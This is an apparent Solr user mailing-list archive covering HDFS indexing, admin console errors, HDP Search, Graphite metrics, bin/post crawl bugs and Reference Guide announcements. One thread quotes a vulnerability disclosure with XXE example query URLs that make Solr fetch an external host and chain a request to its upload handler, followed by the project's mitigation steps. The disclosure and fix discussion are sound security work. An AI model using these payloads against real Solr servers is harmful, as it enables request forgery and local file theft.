Cassandra

On Thu, Dec 7, 2017 at 9:03 AM, Matthew Roth  wrote:

> Yes the post tool would also be an acceptable option and one I am familiar
> with. However, I also am not seeing exactly how I would query hdfs. The
> hadoop-solr [0
> ] tool by
> lucidworks looks the most promising. I have a meeting to attend to shortly,
> and maybe I can explore that further in the afternoon.
>
> I also would like to look further into solrj. I have no real reason to
> store the results of the XSL transformation anywhere other than solr. I am
> simply not familiar with it. But on the surface it seems like it might be
> the most performant way to handle this problem.
>
> If I do pursue this with solrj and spark will solr handle multiple solrj
> connections all trying to add documents?
>
> [0] https://github.com/lucidworks/hadoop-solr/wiki/IngestMappers
>
> On Wed, Dec 6, 2017 at 5:36 PM, Erick Erickson 
> wrote:
>
> > Perhaps the bin/post tool? See:
> > https://lucidworks.com/2015/08/04/solr-5-new-binpost-utility/
> >
> > On Wed, Dec 6, 2017 at 2:05 PM, Matthew Roth  wrote:
> > > Hi All,
> > >
> > > Is there a DIH for HDFS? I see this old feature request [0
> > > ] that never seems to
> > have
> > > gone anywhere. Google searches and searches on this list don't get me
> to
> > > far.
> > >
> > > Essentially my workflow is that I have many thousands of XML documents
> > > stored in hdfs. I run an xslt transformation in spark [1
> > > ]. This transforms
> > to
> > > the expected solr input of . This is
> > > than written the back to hdfs. Now how do I get it back to solr? I
> > suppose
> > > I could move the data back to the local fs, but on the surface that
> feels
> > > like the wrong way.
> > >
> > > I don't need to store the documents in HDFS after the spark
> > transformation,
> > > I wonder if I can write them using solrj. However, I am not really
> > familiar
> > > with solrj. I am also running a single node. Most of the material I
> have
> > > read on spark-solr expects you to be running SolrCloud.
> > >
> > > Best,
> > > Matt
> > >
> > >
> > >
> > > [0] https://issues.apache.org/jira/browse/SOLR-2096
> > > [1] https://github.com/elsevierlabs-os/spark-xml-utils
> >
>


Re: [WARNING: DropBox links may be malicious.] Re: Admin Console Question

2017-11-15 Thread Cassandra Targett
So, from looking at those errors + a bit of Googling, it's complaining that
there are duplicate values in the Args list:

- Repeater: arg in commandLineArgs, Duplicate key:
string:-XX:+UseGCLogFileRotation,
Duplicate
value: -XX:+UseGCLogFileRotation
- Repeater: arg in commandLineArgs, Duplicate key: string:-Xss256k,
Duplicate value: -Xss256k

This tells us a bit about what is happening (the UI finds duplicates in the
arguments), but not why you are the only one who sees this.

>From what I understand, all the UI does is make a call to
http://localhost:8983/solr/admin/info/system and parse the JSON response in
various ways. The Args section comes from the "jvm.jmx.commandLineArgs"
section of that. Somewhere maybe that data is being requested twice and
making a duplicate set of data for the UI to parse?

What do you see when you make a direct call to those stats (
http://localhost:8983/solr/admin/info/system) in your browser? Are they
duplicated? Any errors in the logs?

Unfortunately, these are only clues - maybe they will help someone take
this a step further. If you can, you may also try another browser to see if
it occurs there also.

On Wed, Nov 15, 2017 at 9:40 AM, Webster Homer 
wrote:

> I found that my boss's solr admin console did display the Args the only
> install I have that does...
> I do see errors in both Consoles. I see more errors on the ones that don't
> display Args
> Here are the errors that only show up when Args doesn't:
> Error: [ngRepeat:dupes] Duplicates in a repeater are not allowed. Use
> 'track by' expression to specify unique keys. Repeater: arg in
> commandLineArgs, Duplicate key: string:-XX:+UseGCLogFileRotation,
> Duplicate
> value: -XX:+UseGCLogFileRotation
> http://errors.angularjs.org/1.3.8/ngRepeat/dupes?p0=arg%
> 20in%20commandLineArgs=string%3A-XX%3A%2BUseGCLogFileRotation=-XX%
> 3A%2BUseGCLogFileRotation
> at angular.js:86
> at ngRepeatAction (angular.js:24506)
> at Object.$watchCollectionAction [as fn] (angular.js:14115)
> at Scope.$digest (angular.js:14248)
> at Scope.$apply (angular.js:14511)
> at done (angular.js:9669)
> at completeRequest (angular.js:9859)
> at XMLHttpRequest.requestLoaded (angular.js:9800)
> (anonymous) @ angular.js:11617
>
>
> This is all of the errors I see when loading the page. Most of these show
> up when loading the page
>
> angular.js:11617 TypeError: Cannot read property 'default_text' of
> undefined
> at initOrUpdate (angular-chosen.js:80)
> at NgModelController.ngModel.$render (angular-chosen.js:95)
> at Object.ngModelWatch (angular.js:20998)
> at Scope.$digest (angular.js:14240)
> at Scope.$apply (angular.js:14511)
> at bootstrapApply (angular.js:1472)
> at Object.invoke (angular.js:4205)
> at doBootstrap (angular.js:1470)
> at bootstrap (angular.js:1490)
> at angularInit (angular.js:1384)
> (anonymous) @ angular.js:11617
> (anonymous) @ angular.js:8567
> $digest @ angular.js:14266
> $apply @ angular.js:14511
> bootstrapApply @ angular.js:1472
> invoke @ angular.js:4205
> doBootstrap @ angular.js:1470
> bootstrap @ angular.js:1490
> angularInit @ angular.js:1384
> (anonymous) @ angular.js:26088
> j @ jquery-2.1.3.min.js:27
> fireWith @ jquery-2.1.3.min.js:27
> ready @ jquery-2.1.3.min.js:27
> I @ jquery-2.1.3.min.js:27
> 2angular.js:11617 TypeError: Cannot read property 'results_none_found' of
> undefined
> at disableWithMessage (angular-chosen.js:89)
> at angular-chosen.js:123
> at angular.js:16228
> at completeOutstandingRequest (angular.js:4925)
> at angular.js:5305
> (anonymous) @ angular.js:11617
> (anonymous) @ angular.js:8567
> (anonymous) @ angular.js:16231
> completeOutstandingRequest @ angular.js:4925
> (anonymous) @ angular.js:5305
> setTimeout (async)
> Browser.self.defer @ angular.js:5303
> timeout @ angular.js:16226
> (anonymous) @ angular-chosen.js:114
> $watchCollectionAction @ angular.js:14113
> $digest @ angular.js:14248
> $apply @ angular.js:14511
> bootstrapApply @ angular.js:1472
> invoke @ angular.js:4205
> doBootstrap @ angular.js:1470
> bootstrap @ angular.js:1490
> angularInit @ angular.js:1384
> (anonymous) @ angular.js:26088
> j @ jquery-2.1.3.min.js:27
> fireWith @ jquery-2.1.3.min.js:27
> ready @ jquery-2.1.3.min.js:27
> I @ jquery-2.1.3.min.js:27
> ngtimeago.js:92 about 17 hoursago
> angular.js:11617 Error: [ngRepeat:dupes] Duplicates in a repeater are not
> allowed. Use 'track by' expression to specify unique keys. Repeater: arg in
> commandLineArgs, Duplicate key: string:-Xss256k, Duplicate value: -Xss256k
> http://errors.angularjs.org/1.3.8/ngRepeat/dupes?p0=arg%
> 20in%20commandLineArgs=string%3A-Xss256k=-Xss256k
> at angular.js:86
> at ngRepeatAction (angular.js:24506)
> at Object.$watchCollectionAction [as fn] (angular.js:14115)
> at Scope.$digest (angular.js:14248)
> at Scope.$apply (angular.js:14511)
> at done (angular.js:9669)
> at completeRequest 

Re: Admin Console Question

2017-11-14 Thread Cassandra Targett
I just started 7.1 and see the Args section populated and I don't recall
any issue that intended to modify the prior behavior.

Can you describe how you're starting?

On Tue, Nov 14, 2017 at 9:33 AM, Webster Homer 
wrote:

> We're in the process of upgrading to Solr 7.1. I noticed that the 7.1 Admin
> Dashboard in the Console no longer displays the Args section showing all
> the startup parameters. Instead I just see "Arg" with nothing next to it.
> This has been quite useful as we don't have access to the startup scripts
> in production (or even QA) it allowed me to at a glance see what the
> parameters were.
>
> How do I enable this display in 7.1? In 6.* it was just there out of the
> box.
>
> Thanks
>
> --
>
>
> This message and any attachment are confidential and may be privileged or
> otherwise protected from disclosure. If you are not the intended recipient,
> you must not copy this message or attachment or disclose the contents to
> any other person. If you have received this transmission in error, please
> notify the sender immediately and delete the message and any attachment
> from your system. Merck KGaA, Darmstadt, Germany and any of its
> subsidiaries do not accept liability for any omissions or errors in this
> message which may arise as a result of E-Mail-transmission or for damages
> resulting from any unauthorized changes of the content of this message and
> any attachment thereto. Merck KGaA, Darmstadt, Germany and any of its
> subsidiaries do not guarantee that this message is free of viruses and does
> not accept liability for any damages caused by any virus transmitted
> therewith.
>
> Click http://www.emdgroup.com/disclaimer to access the German, French,
> Spanish and Portuguese versions of this disclaimer.
>


Re: Solr / HDPSearch related

2017-11-10 Thread Cassandra Targett
Some of these questions should be directed to Hortonworks, but I'm glad you
posted them here because I noticed you asked similar questions on the IRC
channel but left before I could jump in and help. Full disclosure, I work
for Lucidworks and one of my jobs is managing the development team that
makes HDP Search.

The HDP Search package is an official release of Solr plus some connectors
and development kits that allow you to index content either stored in or
accessed by common Hadoop components (namely, HDFS, Hive, HBase, Spark, and
Storm), and with an Ambari integration for managing Solr. It has ALL of the
features of each Solr release - when we build HDP Search we download Solr
from archive.apache.org and not any kind of clone or forked repo - so if
you can do it with Solr you download outside of that package, you can do it
with the Solr in that package.

To answer your specific questions:

- There are cases where it's more performant to store indexes on the local
filesystem than to use HDFS, but I think it would only be a dramatic
difference if you have a high query rate (others may disagree with this
assessment). As for why someone would do this...if you have 20 half-empty
servers already allocated for HDFS, you probably don't want 5 more for
Solr. You could just use the distributed filesystem you have.

- When the indexes are stored in HDFS, you can absolutely update documents.
In this respect it's really not all that different from a local filesystem.
If you want a bit more information about this, see the Solr Ref Guide:
https://lucene.apache.org/solr/guide/running-solr-on-hdfs.html

- You should discuss the license options with Hortonworks. I believe they
charge separately for HDP Search, but I do not know the details or numbers
(I'm just manage the dev, not the business ;-) ).

- The integration with Ambari doesn't care about where the indexes are -
they can be on HDFS or locally. It's part of the setup of Solr via Ambari
to decide where the indexes will go. I will say the integration with Ambari
isn't very deep - you can monitor the state of Solr on each node (is it
running or not, basically), but besides a few config options you'll still
use the Solr Admin UI for most Solr-related tasks. In the most recent
releases for HDP 2.6, we added alerting in case Solr is down on any node,
and Solr's metrics are stored in the Ambari Metrics System with a few
Grafana dashboards for monitoring load, etc.

Documentation for HDP Search is available at:
https://doc.lucidworks.com/lucidworks-hdpsearch/2.6/index.html if you're
interested in more detail, including screenshots of the Ambari config
options.

Hope this helps clear things up for you -

Cassandra

On Fri, Nov 10, 2017 at 10:08 AM, Greenhorn Techie <
greenhorntec...@gmail.com> wrote:

> Hi,
>
> We have a HDP product cluster and are now planning to build a search
> solution for some of our business requirements. In this regard, I have the
> following questions. Can you please answer the below questions with respect
> to Solr?
>
>- As I understand, it is more performant to have SolrCloud set-up to use
>local storage instead of HDFS for storing the indexes. If so, what are
> the
>use-cases where SolrCloud would store index in HDFS?
>- Also, if the indexes are stored in HDFS, will it be possible to update
>the documents stored in Solr in that case?
>- Will HDP Search be supported as part of HDP support license itself or
>does it need additional license?
>- If SolrCloud is configured to use local storage, can it still be
>managed through Ambari? What aspects of SolrCloud might not be available
>through Ambari? Monitoring?
>
> Just to provide more context, our data to be indexed is not in HDP at the
> moment and would come from external sources.
>
> Thanks
>


Re: Issues with Graphite reporter config

2017-11-07 Thread Cassandra Targett
I believe this is https://issues.apache.org/jira/browse/SOLR-11413,
which has a fix already slated for Solr 7.2.

On Tue, Nov 7, 2017 at 10:44 AM, sudershan madhavan
 wrote:
> Hi,
> I am running Solrcloud version: 6.6.1
> I have been trying to use graphite to report solr metrics and seem to get
> the below error while doing so in the solr logs:
>>
>> java.lang.NullPointerException
>> at
>> com.codahale.metrics.graphite.PickledGraphite.pickleMetrics(PickledGraphite.java:313)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:255)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportGauge(GraphiteReporter.java:345)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:243)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> 2017-11-07 15:28:47.543 WARN  (metrics-graphite-reporter-3-thread-1) [   ]
>> c.c.m.g.GraphiteReporter Unable to report to Graphite
>> java.net.SocketException: Socket closed
>> at
>> java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:118)
>> at java.net.SocketOutputStream.write(SocketOutputStream.java:143)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:261)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.sendIfEnabled(GraphiteReporter.java:328)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportTimer(GraphiteReporter.java:288)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:259)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> 2017-11-07 15:28:47.543 ERROR (metrics-graphite-reporter-1-thread-1) [   ]
>> c.c.m.ScheduledReporter Exception thrown from GraphiteReporter#report.
>> Exception was suppressed.
>> java.lang.NullPointerException
>> at java.util.LinkedList$ListItr.next(LinkedList.java:893)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.pickleMetrics(PickledGraphite.java:305)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:255)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.sendIfEnabled(GraphiteReporter.java:328)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportMetered(GraphiteReporter.java:304)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:255)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at

ANNOUNCE: Solr Reference Guide for Solr 7.1 released

2017-11-02 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 7.1 is now available.

This 1,077-page PDF is the definitive guide to using Apache Solr, the
search server built on Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.1.pdf.

It is also available online at https://lucene.apache.org/solr/guide/7_1.

New in this version of the Guide is documentation for the new features
released in Solr 7.1. In addition, we have reorganized the main
sections a bit, adding a new section "Deployment and Operations" where
information for operational management of Solr (such as the location
of major config files, how to go to production, running on HDFS, etc.)
now resides. We intend to add more to this section in future releases.

Regards,
Cassandra


Re: solr 7.0.1: exception running post to crawl simple website

2017-10-27 Thread Cassandra Targett
Toby,

Your mention of "-recursive" causing a problem reminded me of a simple
crawl (of the 7.0 Ref Guide) using bin/post I was trying to get to
work the other day and couldn't.

The order of the parameters seems to make a difference with what error
you get (this is using 7.1):

1. "./bin/post -c gettingstarted -delay 10
https://lucene.apache.org/solr/guide/7_0 -recursive"

yields the stack trace in the previous message:

POSTed web resource https://lucene.apache.org/solr/guide/7_0 (depth: 0)
[Fatal Error] :1:1: Content is not allowed in prolog.
Exception in thread "main" java.lang.RuntimeException:
org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 1; Content
is not allowed in prolog.
at 
org.apache.solr.util.SimplePostTool$PageFetcher.getLinksFromWebPage(SimplePostTool.java:1252)
at org.apache.solr.util.SimplePostTool.webCrawl(SimplePostTool.java:616)
at org.apache.solr.util.SimplePostTool.postWebPages(SimplePostTool.java:563)
at org.apache.solr.util.SimplePostTool.doWebMode(SimplePostTool.java:365)
at org.apache.solr.util.SimplePostTool.execute(SimplePostTool.java:187)
at org.apache.solr.util.SimplePostTool.main(SimplePostTool.java:172)
Caused by: org.xml.sax.SAXParseException; lineNumber: 1; columnNumber:
1; Content is not allowed in prolog.
at 
com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(DOMParser.java:257)
at 
com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(DocumentBuilderImpl.java:339)
at javax.xml.parsers.DocumentBuilder.parse(DocumentBuilder.java:121)
at org.apache.solr.util.SimplePostTool.makeDom(SimplePostTool.java:1061)
at 
org.apache.solr.util.SimplePostTool$PageFetcher.getLinksFromWebPage(SimplePostTool.java:1232)
... 5 more

2. "./bin/post -c gettingstarted -delay 10 -recursive
https://lucene.apache.org/solr/guide/7_0;

yields:

No files, directories, URLs, -d strings, or stdin were specified.

See './bin/post -h' for usage instructions.

3. "./bin/post -c gettingstarted
http://lucene.apache.org/solr/guide/7_0 -recursive -delay 10"

yields:

Unrecognized argument: 10

If this was intended to be a data file, it does not exist relative to
/Applications/Solr/solr-7.1.0

4. "./bin/post -c gettingstarted -delay 10
https://lucene.apache.org/solr/guide/7_0;

successfully gets the document, but only the single page at that URL.
It does not extract any of the content of the page besides the title
and metadata Tika adds.

I'd say we should probably file a JIRA for it. If the parsing is wrong
(as it seems to me to be), that's a different problem, but the fact
you can't use recursive at all is a bug AFAICT.

Cassandra

On Fri, Oct 27, 2017 at 11:03 AM, toby1851  wrote:
> Amrit Sarkar wrote
>> The above is SAXParse, runtime exception. Nothing can be done at Solr end
>> except curating your own data.
>
> I'm trying to replace a solr-4.6.0 system (which has been working
> brilliantly for 3 years!) with solr-7.1.0. I'm running into this exact same
> problem.
>
> I do not believe it is a data curation problem. (Even if it were, it's very
> unfriendly just to bomb out with a stack trace. And it's seriously annoying
> that there's a 14 line error message about a parsing problem, but it
> entirely neglects to mention what it was trying to parse! Was it a file, a
> URL...?)
>
> Anyway, the symptoms I'm seeing are that a simple "post -c foo https://...;
> works fine. But the moment I turn on recursion, it fails before fetching a
> second page. It doesn't matter what the first page is. Really: when I made
> no progress with the site that I'm actually trying to index, I tried another
> of my sites, then Google, then eBay... In every case, I get something like
> this:
>
> $ post -c mycollection https://www.ebay.co.uk -recursive 1 -delay 10
> ...
> POSTed web resource https://www.ebay.co.uk (depth: 0)
> ... [ 10s delay ]
> [Fatal Error] :1:1: Content is not allowed in prolog.
> ...
>
> I've been looking at the code, and also what's going with strace. As far as
> I can see, at the point where the exception occurs, we are parsing data (a
> copy of the page, presumably) that has come from the solr server itself.
> That appears to be a chunk of JSON with embedded XML. The inner XML does
> look to at least start correctly. The fact that we're getting an error at
> line 1 column 1 every single time makes me suspect that we're feeding the
> wrong thing to the SAX parser.
>
> Anyway, I'm going to go and look at nutch as I need something working very
> soon.
>
> But could somebody who is familiar with this code take another look?
>
> Cheers,
>
> Toby.
>
>
>
>
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: zero-day exploit security issue

2017-10-18 Thread Cassandra Targett
The JIRA issues are now publicly viewable:

https://issues.apache.org/jira/browse/SOLR-11482
https://issues.apache.org/jira/browse/SOLR-11477



On Wed, Oct 18, 2017 at 4:49 AM, Ishan Chattopadhyaya
 wrote:
> There will be a 5.5.5 release soon. 6.6.2 has just been released.
>
> On Mon, Oct 16, 2017 at 8:17 PM, Keith L  wrote:
>
>> Additionally, it looks like the commits are public on github. Is this
>> backported to 5.5.x too? Users that are still on 5x might want to backport
>> some of the issues themselves since is not officially supported anymore.
>>
>> On Mon, Oct 16, 2017 at 10:11 AM Mike Drob  wrote:
>>
>> > Given that the already public nature of the disclosure, does it make
>> sense
>> > to make the work being done public prior to release as well?
>> >
>> > Normally security fixes are kept private while the vulnerabilities are
>> > private, but that's not the case here...
>> >
>> > On Mon, Oct 16, 2017 at 1:20 AM, Shalin Shekhar Mangar <
>> > shalinman...@gmail.com> wrote:
>> >
>> > > Yes, there is but it is private i.e. only the Apache Lucene PMC
>> > > members can see it. This is standard for all security issues in Apache
>> > > land. The fixes for this issue has been applied to the release
>> > > branches and the Solr 7.1.0 release candidate is already up for vote.
>> > > Barring any unforeseen circumstances, a 7.1.0 release with the fixes
>> > > should be expected this week.
>> > >
>> > > On Fri, Oct 13, 2017 at 8:14 PM, Xie, Sean  wrote:
>> > > > Is there a tracking to address this issue for SOLR 6.6.x and 7.x?
>> > > >
>> > > > https://lucene.apache.org/solr/news.html#12-october-
>> > > 2017-please-secure-your-apache-solr-servers-since-a-
>> > > zero-day-exploit-has-been-reported-on-a-public-mailing-list
>> > > >
>> > > > Sean
>> > > >
>> > > > Confidentiality Notice::  This email, including attachments, may
>> > include
>> > > non-public, proprietary, confidential or legally privileged
>> information.
>> > > If you are not an intended recipient or an authorized agent of an
>> > intended
>> > > recipient, you are hereby notified that any dissemination, distribution
>> > or
>> > > copying of the information contained in or transmitted with this e-mail
>> > is
>> > > unauthorized and strictly prohibited.  If you have received this email
>> in
>> > > error, please notify the sender by replying to this message and
>> > permanently
>> > > delete this e-mail, its attachments, and any copies of it immediately.
>> > You
>> > > should not retain, copy or use this e-mail or any attachment for any
>> > > purpose, nor disclose all or any part of the contents to any other
>> > person.
>> > > Thank you.
>> > >
>> > >
>> > >
>> > > --
>> > > Regards,
>> > > Shalin Shekhar Mangar.
>> > >
>> >
>>


Re: Several critical vulnerabilities discovered in Apache Solr (XXE & RCE)

2017-10-12 Thread Cassandra Targett
Michael,

On behalf of the Lucene PMC, thank you for reporting these issues. Please
be assured we are actively looking into them and are working to provide
resolutions as soon as possible. Somehow no one in the Lucene/Solr
community saw your earlier mail so we have an unfortunate delay in reacting
to this report.

This has been assigned a public CVE (CVE-2017-12629) which we will
reference in future communication about resolution and mitigation steps.

For everyone following this thread, here is what we're doing now:

* Until fixes are available, all Solr users are advised to restart their
Solr instances with the system parameter `-Ddisable.configEdit=true`. This
will disallow any changes to be made to configurations via the Config API.
This is a key factor in this vulnerability, since it allows GET requests to
add the RunExecutableListener to the config.
** This is sufficient to protect you from this type of attack, but means
you cannot use the edit capabilities of the Config API until the other
fixes described below are in place.

* A new release of Lucene/Solr was in the vote phase, but we have now
pulled it back to be able to address these issues in the upcoming 7.1
release. We will also determine mitigation steps for users on earlier
versions, which may include a 6.6.2 release for users still on 6.x.

* The RunExecutableListener will be removed in 7.1. It was previously used
by Solr for index replication but has been replaced and is no longer needed.

* The XML Parser will be fixed and the fixes will be included in the 7.1
release.

* The 7.1 release was already slated to include a change to disable the
`stream.body` parameter by default, which will further help protect systems.

We hope you are unable to find any vulnerabilities in the future, but, for
the record, the ASF policy for reporting these types of issues is to email
them to secur...@apache.org only. This is to prevent vulnerabilities from
getting out into the public before fixes can be identified so we avoid
exposing our community to attacks by malicious actors. More information on
these policies is available from the Security Team's website:
https://www.apache.org/security/.

We will have more information shortly about the timing of the 7.1 release
as well as ways for pre-7.0 users to gain access to the fixes for their
versions.

Best,
Cassandra


On Thu, Oct 12, 2017 at 7:16 AM, Michael Stepankin 
wrote:

> Hello,
>
> Could you look at this please. It’s a bit important.
>
> On Fri, 22 Sep 2017 at 01:15, Michael Stepankin 
> wrote:
>
>> Hello
>>
>> We would like to report two important vulnerabilities in the latest
>> Apache Solr distribution. Both of them have critical risk rating and they
>> could be chained together in order to compromise the running Solr server
>> even from unprivileged external attacker.
>>
>> *First Vulnerability: XML External Entity Expansion (deftype=xmlparser) *
>>
>> Lucene includes a query parser that is able to create the full-spectrum
>> of Lucene queries, using an XML data structure. Starting from version 5.1
>> Solr supports "xml" query parser in the search query.
>>
>> The problem is that lucene xml parser does not explicitly prohibit
>> doctype declaration and expansion of external entities. It is possible to
>> include special entities in the xml document, that point to external files
>> (via file://) or external urls (via http://):
>>
>> Example usage: http://localhost:8983/solr/gettingstarted/select?q={!
>> xmlparser v='http://xxx.s.artsploit.com/xxx
>> "'>'}
>>
>> When Solr is parsing this request, it makes a HTTP request to
>> http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE
>> definition.
>>
>> Considering that we can define parser type in the search query, which is
>> very often comes from untrusted user input, e.g. search fields on websites.
>> It allows to an external attacker to make arbitrary HTTP requests to the
>> local SOLR instance and to bypass all firewall restrictions.
>>
>> For example, this vulnerability could be user to send malicious data to
>> the '/upload' handler:
>>
>> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser
>> v='http://xxx.s.artsploit.com/
>> solr/gettingstarted/upload?stream.body={"xx":"yy"}&
>> commit=true"'>'}
>>
>> This vulnerability can also be exploited as Blind XXE using ftp wrapper
>> in order to read arbitrary local files from the solrserver.
>>
>> *Vulnerable code location:*
>> /solr/src/lucene/queryparser/src/java/org/apache/lucene/
>> queryparser/xml/CoreParser.java
>>
>> static Document parseXML(InputStream pXmlFile) throws ParserException {
>> DocumentBuilderFactory dbf = *DocumentBuilderFactory.newInstance*();
>> DocumentBuilder db = null;
>> try {
>>   db = *dbf.newDocumentBuilder*();
>> }
>> catch (Exception se) {
>>   throw new ParserException("XML Parser configuration error", se);
>> }
>> org.w3c.dom.Document doc = null;
>> try {
>>   

Re: Question regarding Upgrading to SolrCloud

2017-10-05 Thread Cassandra Targett
The 7.0 Ref Guide was released Monday.

An overview of the new replica types is available online here:
https://lucene.apache.org/solr/guide/7_0/shards-and-indexing-data-in-solrcloud.html#types-of-replicas.
The replica type is specified when you either create the collection or
add a replica.

On Thu, Oct 5, 2017 at 9:01 AM, Erick Erickson  wrote:
> Gopesh:
>
> There is brand new functionality in Solr 7, see: SOLR-10233, the
> "PULL" replica type which is a hybrid SolrCloud replica that uses
> master/slave type replication. You should find this in the reference
> guide, the 7.0 ref guide should be published soon. Meanwhile, that
> JIRA will let you know. Also see .../solr/CHANGES.txt. As Emir says,
> though, it would require ZooKeeper.
>
> Really, though, once you move to SolrCloud (if you do) I'd stick with
> the standard NRT replica type unless I had reason to use one of the
> other two, (TLOG and PULL) as they're for pretty special situations.
>
> All that said, if you're happy with master/slave there's no compelling
> reason to go to SolrCloud, especially for smaller installations.
>
> Best,
> Erick
>
> On Wed, Oct 4, 2017 at 11:46 PM, Gopesh Sharma
>  wrote:
>> Hello Guys,
>>
>> As of now we are running Solr 3.4 with Master Slave Configuration. We are 
>> planning to upgrade it to the lastest version (6.6 or 7). Questions I have 
>> before upgrading
>>
>>
>>   1.  Since we do not have a lot of data, is it required to move to 
>> SolrCloud or continue using it Master Slave
>>   2.  Is the support for Master Slave will be there in the future release or 
>> do you plan to remove it.
>>   3.  Can we configure master-slave replication in Solr Cloud, if yes then 
>> do we need zookeeper as well.
>>
>> Thanks,
>> Gopesh Sharma


ANNOUNCE: Apache Solr Reference Guide for 7.0 released

2017-10-02 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 7.0 is now available.

This 1,035-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.0.pdf.

It is also available online at https://lucene.apache.org/solr/guide/7_0.

Included in this release is documentation for the major new features
released in Solr 7.0, with an extensive list of configuration changes
and deprecations you should be aware of while upgrading.

Cassandra


Re: Official PDF Reference Guide for Solr 7.0

2017-09-29 Thread Cassandra Targett
The vote is going on now, and only needs one more +1 to pass (it's
been on long enough). If I get that today, I can start the release
tonight or this weekend and you should see the announcement
Monday/Tuesday next week.

Cassandra

On Fri, Sep 29, 2017 at 2:42 AM, Basso Luca
 wrote:
> Hi all,
> anybody knows when the "Official PDF Reference Guide for Solr 7.0" will be 
> released?
>
> Thanks,
> Luca


Re: Solr 7.0.0 -- can it use a 6.5.0 data repository (index)

2017-09-27 Thread Cassandra Targett
Regarding not finding the issue, JIRA has a problem with queries when
the user is not logged in (see also
https://jira.atlassian.com/browse/JRASERVER-38511 if you're interested
in the details). There's unfortunately not much we can do about it
besides manually edit issues to remove a security setting which gets
automatically added to issues when they are created (which I've now
done for SOLR-11406).

Your best bet in the future would be to log into JIRA before
initiating a search to be sure you aren't missing one that's "hidden"
inadvertently.

Cassandra

On Wed, Sep 27, 2017 at 1:39 PM, Wayne L. Johnson
 wrote:
> First, thanks for the quick response.  Yes, it sounds like the same problem!!
>
> I did a bunch of searching before repoting the issue, I didn't come across 
> that JIRA or I wouldn't have reported it.  My apologies for the duplication 
> (although it is a new JIRA).
>
> Is there a good place to start searching in the future?  I'm a fairly 
> experiences Solr user, and I don't mind slogging through Java code.
>
> Meanwhile I'll follow the JIRA so I know when it gets fixed.
>
> Thanks!!
>
> -Original Message-
> From: Stefan Matheis [mailto:matheis.ste...@gmail.com]
> Sent: Wednesday, September 27, 2017 12:32 PM
> To: solr-user@lucene.apache.org
> Subject: Re: Solr 7.0.0 -- can it use a 6.5.0 data repository (index)
>
> That sounds like 
